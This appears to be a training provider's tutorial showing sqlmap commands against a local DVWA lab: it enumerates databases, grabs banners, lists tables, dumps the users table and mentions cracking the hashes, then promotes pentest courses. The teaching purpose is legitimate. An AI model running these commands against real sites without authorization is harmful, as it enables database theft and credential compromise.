How to Use SQLMAP ?

SQLMapa Practical Training



How to Use SQLMAP ?



SQLMAP is an automatic SQL injection tool. It is an open source tool which is used in Penetration Testing. This automates the process of detecting the SQL injection flaws and can further exploit it to take over the database. This is an important tool which will be taught under CEH, Penetration Testing & ECSA Training Certification.

SQLMAP has a powerful detection engine and many other features like database fingerprinting, accessing underline file system which is very helpful for the pentester. In an organization, it used to perform Web Application Pen Testing to find out SQL injection vulnerabilities.

Working of SQLMAP

Here we are taking DVWA as a testing Site

  1. Finding all Databases from a server.
sqlmap -u "localhost/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=stgepj8mmmdnbmc6sqneg9qun3" –dbs

  



Finding all Databases

Finding all Databases from Server

  1. Banner grabbing
sqlmap -u "localhost/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=stgepj8mmmdnbmc6sqneg9qun3" -f

Banner Grabbing

Banner Grabbing

3.Finding out tables in particular database

sqlmap -u "localhost/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=stgepj8mmmdnbmc6sqneg9qun3" -D dvwa–tables

Finding out tables in particular database

Finding out tables in particular database

4.Dumping the whole table

sqlmap -u "localhost/DVWA-1.9/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=stgepj8mmmdnbmc6sqneg9qun3" -D dvwa -T users  --dump

Dumping the whole table

Dumping the whole table

See what we get ..the whole database. Now We can decrypt the hashes and receive the desired information. With an SQL vulnerability and an automated tool sometimes, we can get the whole database. In Web Penetration Testing we check the websites for these kinds of vulnerabilities which could lead to leakage of valuable information.

Codec Networks is a leading Information Security Service provider in a B2B domain which uses Penetration testing for The Web, Network and Application Security Testing. SQLMAP is extensively used by Web Application Security Specialists in Codec Networks as a part of deep Penetration Testing.
Codec Networks provide a Professional IT Training platform where young collegiate and Entry level executives are being groomed with latest practical tools and deep Cybersecurity expertise and knowledge to get groomed at par with our Industry professionals.

We provide Professional training by EC Council and Israel Company Cyber Security Hacker U Pro, we provide an environment exactly like the actual one where they will be taught how to perform information gathering, scanning, getting access i.e. hacking, maintaining access, clearing tracks as well as how to secure their own networks.

Comments